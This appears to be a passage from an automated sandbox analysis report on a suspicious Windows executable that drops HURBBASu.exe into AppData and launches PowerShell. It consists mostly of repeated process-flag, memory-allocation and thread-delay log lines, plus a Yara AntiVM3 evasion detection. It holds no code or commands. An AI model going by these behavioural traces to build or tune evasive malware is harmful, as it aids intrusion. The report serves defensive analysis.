Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: SNKO05B241100201.exe PID: 7148, type: MEMORYSTR

Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Memory allocated: 2C10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Memory allocated: 2E20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Memory allocated: 4E20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Memory allocated: 8F80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Memory allocated: 9F80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Memory allocated: A180000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Memory allocated: B180000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Memory allocated: 1270000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Memory allocated: 2C20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Memory allocated: 4C20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Memory allocated: F10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Memory allocated: 29C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Memory allocated: 49C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Memory allocated: 85D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Memory allocated: 95D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Memory allocated: 97C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Memory allocated: A7C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Memory allocated: 1280000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Memory allocated: 2D20000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Memory allocated: 2B60000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 599874	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 599546	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 599327	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 598999	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 598658	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 598515	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 598406	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 598296	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 598187	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 598078	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 597968	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 597859	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 597750	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 597640	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 597531	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 597421	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 597312	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 597203	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 597093	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 596984	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 596875	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 596765	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 596656	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 596546	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 596437	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 596328	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Thread delayed: delay time: 596218	Jump to behavior
